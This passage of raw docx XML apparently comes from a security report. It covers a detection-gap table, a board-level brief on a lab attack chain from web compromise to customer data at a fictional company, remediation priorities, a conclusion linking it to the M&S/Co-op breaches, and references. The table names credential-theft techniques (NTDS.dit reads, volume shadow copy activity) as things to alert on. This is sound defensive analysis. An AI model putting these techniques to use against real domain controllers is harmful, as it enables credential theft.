                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Administrative-looking DC access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="370A27CB" w14:textId="41786382" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00484DB7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> reads and volume-shadow-copy activity alerting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="149BD3A1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32DD532F" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6FCD101B" w14:textId="38D9E19C" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00484DB7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Leaving data over an already established channel </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28EFDA70" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Egress monitoring / DLP on unusual outbound data volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39129244" w14:textId="65A5D788" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00484DB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Recurring Theme Mirrors Task 1. The most dangerous phases </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>( lateral</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> movement and credential </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>access )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> use legitimate authentication and built-in tooling, so signature-based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> miss them. You need identity-centric detection and egress monitoring, not just perimeter controls, to close the gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18821F2F" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc234776735"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.9 Executive Brief for the Board</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="77CAF826" w14:textId="77777777" w:rsidR="00BD02D4" w:rsidRPr="00796916" w:rsidRDefault="00BD02D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The attached one-page brief translates the technical findings into business terms for a non-technical board audience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6419CA" w14:textId="77777777" w:rsidR="00BD02D4" w:rsidRPr="00796916" w:rsidRDefault="00BD02D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Simply put, a determined attacker was able to move from ABCD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ltd’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> public website all the way to a sample customer record inside the corporate network, using the same style of attack that recently cost UK retailers hundreds of millions of pounds. Mostly the failed controls can be repaired and they are inexpensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A9B71C" w14:textId="5151DBA5" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Business risk: </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the demonstrated chain would, in production, expose customer data (regulatory and reputational risk under UK GDPR), enable ransomware disruption of trading (direct revenue loss), and damage customer trust during recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A3749" w14:textId="77777777" w:rsidR="00BD02D4" w:rsidRPr="00796916" w:rsidRDefault="00BD02D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What aided: an unpatched public web app, poor internal segmentation and identity controls that didn't prevent stolen credentials from being reused across the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D901430" w14:textId="77777777" w:rsidR="00BD02D4" w:rsidRPr="00796916" w:rsidRDefault="00BD02D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CED78A" w14:textId="77777777" w:rsidR="00BD02D4" w:rsidRPr="00796916" w:rsidRDefault="00BD02D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F122A66" w14:textId="5A59AC77" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Prioritised, board-level investment recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F18FC0" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Patch and shield public web applications, and deploy phishing-resistant multi-factor authentication for staff — low cost, immediate risk reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24ACF7" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Segment the network and enforce least-privilege administration so a single compromise cannot spread — moderate cost, high impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C4F15" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Invest in identity-based threat detection and tested, offline backups — the controls that shorten both discovery time and recovery time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714299D0" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The strategic argument for the board is that these investments are small relative to the demonstrated downside: the M&amp;S/Co-op event's estimated £270–£440 million impact is the price of not making them.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[9]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2313C1D1" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc234776736"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4 · Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="0C187B93" w14:textId="77777777" w:rsidR="00BD02D4" w:rsidRPr="00796916" w:rsidRDefault="00BD02D4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc234776737"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Across both objectives a key lesson recurs: current offensive success is founded on identification and trust rather than novel vulnerabilities.  Task 1 revealed how a financially motivated group turned a help-desk phone contact into a national-scale retail disaster, and how the failed controls – identity verification, MFA hardening, segmentation and hypervisor protection — map directly onto the MITRE ATT&amp;CK methodologies observed.  Task 2 recreated the same logic ethically in an isolated lab, proving an end-to-end chain from web compromise to internal data access, and then converting that chain into a defensible detection-gap analysis and a business case the board can act on.  The unifying solution is to move defensive investment toward identity assurance, segmentation and detection of legitimate-looking misuse – the precise seams that both the real campaign and the simulated engagement exploited. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0451B" w14:textId="0218CA60" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5 · References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="2227EC29" w14:textId="5DC538F4" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>BlackFog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2025) Marks &amp; Spencer breach: how a ransomware attack crippled a UK retail giant. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">blackfog.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Accessed: 2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BA214" w14:textId="3BF744C2" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer Weekly (2025) ‘M&amp;S, Co-op attacks a “Category 2 cyber hurricane”, say UK experts’, 20 June. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">computerweekly.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA5DA85" w14:textId="1956EC7C" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Monitoring Centre (2025) Statement on ransomware incidents in the retail sector, June 2025. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">cybermonitoringcentre.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBCE087" w14:textId="2FE3A449" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE (2024) MITRE ATT&amp;CK® Enterprise Matrix. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">attack.mitre.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFE8E6F" w14:textId="08F6618F" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation (2021) OWASP Top 10:2021. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">owasp.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB07AC" w14:textId="1AC72143" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Periculo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2025) ‘2025 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on major retailers: M&amp;S, Co-op, Adidas, Harrods’, 17 July. Available at: </w:t>
      </w:r>
